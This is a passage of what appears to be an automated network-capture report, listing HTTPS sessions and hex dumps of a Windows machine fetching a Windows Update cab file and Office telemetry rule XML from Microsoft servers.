                                                                                        2024-11-30 11:47:19 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.44975420.12.23.50443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:47:59 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UdDeAusWWV4YHsm&MD=+XvgSgZm HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                        Host: slscr.update.microsoft.com
                                                                                        2024-11-30 11:47:59 UTC560INHTTP/1.1 200 OK
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Content-Type: application/octet-stream
                                                                                        Expires: -1
                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                        MS-CorrelationId: b4323365-1499-4a59-97b4-46ae39fb45c7
                                                                                        MS-RequestId: 94c73235-a53a-4842-ba62-d510b00dd03e
                                                                                        MS-CV: h9nXZt24F0C9E51V.0
                                                                                        X-Microsoft-SLSClientCache: 1440
                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Date: Sat, 30 Nov 2024 11:47:58 GMT
                                                                                        Connection: close
                                                                                        Content-Length: 30005
                                                                                        2024-11-30 11:47:59 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                        2024-11-30 11:47:59 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        7192.168.2.44975313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:47:59 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:47:59 UTC471INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:47:59 GMT
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 218853
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public
                                                                                        Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
                                                                                        ETag: "0x8DD0EF5BC53602D"
                                                                                        x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114759Z-174f7845968vqt9xhC1EWRgten00000011d0000000006d7s
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:47:59 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                        2024-11-30 11:47:59 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                        Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                        2024-11-30 11:47:59 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                        Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                        2024-11-30 11:47:59 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                        Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                        2024-11-30 11:47:59 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                        Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                        2024-11-30 11:47:59 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                        Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                        2024-11-30 11:48:00 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                        Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                        2024-11-30 11:48:00 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                        Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                        2024-11-30 11:48:00 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                        2024-11-30 11:48:00 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                        Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        8192.168.2.44975513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:01 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:02 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 3788
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                        x-ms-request-id: 748acc8f-d01e-0082-56a3-42e489000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114802Z-174f7845968vqt9xhC1EWRgten00000011a0000000009xq1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:02 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        9192.168.2.44975613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:02 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:02 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 450
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                        x-ms-request-id: 22636776-e01e-0003-4fa8-420fa8000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114802Z-174f7845968qj8jrhC1EWRh41s00000011800000000093e4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:02 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        10192.168.2.44975713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:02 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:02 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2980
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                        x-ms-request-id: 244a857b-101e-008d-0f0a-4192e5000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114802Z-174f7845968pght8hC1EWRyvxg00000004h0000000005hxg
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:02 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
